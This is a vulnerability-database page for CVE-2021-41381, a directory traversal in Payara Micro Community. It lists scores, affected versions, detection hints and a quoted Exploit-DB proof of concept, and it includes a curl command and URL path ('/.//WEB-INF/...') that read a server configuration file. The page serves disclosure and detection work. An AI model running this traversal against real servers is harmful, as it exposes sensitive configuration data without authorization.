CVE-2021-41381
published 2021-09-23CVE-2021-41381: Payara Micro Community 5.2021.6 and below allows Directory Traversal.
PriorityP269high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
52.93%
98.8th percentile
Payara Micro Community 5.2021.6 and below allows Directory Traversal.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| payara | micro_community | <= 5.2021.6 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandcurl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties↗
- →Detect exploitation attempts by matching HTTP GET requests containing the traversal pattern '/.//WEB-INF/' in the request URI. ↗
- →Confirm successful exploitation by checking the HTTP response body for the string 'payara.security.openid.default.providerURI=' AND 'payara.security.openid.sessionScopedConfiguration=true'. ↗
- →The traversal bypass relies on the '/./' double-slash sequence to evade standard WEB-INF path protection; monitor for this pattern in access logs. ↗
- →Use --path-as-is flag in curl to prevent client-side path normalization; defenders should look for raw un-normalized paths in server access logs. ↗
- ·The vulnerability affects Payara Micro Community 5.2021.6 and below only; later versions are not confirmed vulnerable. ↗
- ·The exploit was tested on both Linux and Windows OS environments, so detection rules should not be OS-scoped. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Payara Micro Community 5.2021.6 - Directory Traversal
exploitdb·2021-10-04·CVSS 7.5
CVE-2021-41381 [HIGH] Payara Micro Community 5.2021.6 - Directory Traversal
Payara Micro Community 5.2021.6 - Directory Traversal
---
# Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal
# Date: 01/10/2021
# Exploit Author: Yasser Khan (N3T_hunt3r)
# Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html
# Software Link: https://www.payara.fish/downloads/payara-platform-community-edition/#x
# Version: Payara Micro Community 5.2021.6
# Tested on: Linux/Windows OS
# CVE : CVE-2021-41381
https://nvd.nist.gov/vuln/detail/CVE-2021-41381
Proof of Concept:
Step1: Open the browser check the version of the payara software
Step2: Add this Path at end of the URL
/.//WEB-INF/classes/META-INF/microprofile-config.properties
Step3: Check the response with match containing
"payara.security.openid.default.providerU
Nuclei
Payara Micro Community 5.2021.6 Directory Traversal
nuclei·CVSS 7.5
CVE-2021-41381 [HIGH] Payara Micro Community 5.2021.6 Directory Traversal
Payara Micro Community 5.2021.6 Directory Traversal
Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.
Template:
id: CVE-2021-41381
info:
name: Payara Micro Community 5.2021.6 Directory Traversal
author: pikpikcu
severity: high
description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.
impact: |
An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
remediation: |
Upgrade to a patched version of Payara Micro Community or apply the necessary security patches to mitigate the directory traversal vulnerability.
reference:
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
- https://nvd.nist.gov/vuln/detail/C
No writeups or analysis indexed.
http://packetstormsecurity.com/files/164365/Payara-Micro-Community-5.2021.6-Directory-Traversal.htmlhttp://packetstormsecurity.com/files/169864/Payara-Platform-Path-Traversal.htmlhttp://seclists.org/fulldisclosure/2022/Nov/11https://github.com/Net-hunter121/CVE-2021-41381/blob/main/CVE:%202021-41381-POChttps://www.exploit-db.com/exploits/50371https://www.payara.fishhttps://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txthttp://packetstormsecurity.com/files/164365/Payara-Micro-Community-5.2021.6-Directory-Traversal.htmlhttp://packetstormsecurity.com/files/169864/Payara-Platform-Path-Traversal.htmlhttp://seclists.org/fulldisclosure/2022/Nov/11https://github.com/Net-hunter121/CVE-2021-41381/blob/main/CVE:%202021-41381-POChttps://www.exploit-db.com/exploits/50371https://www.payara.fishhttps://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
2021-09-23
Published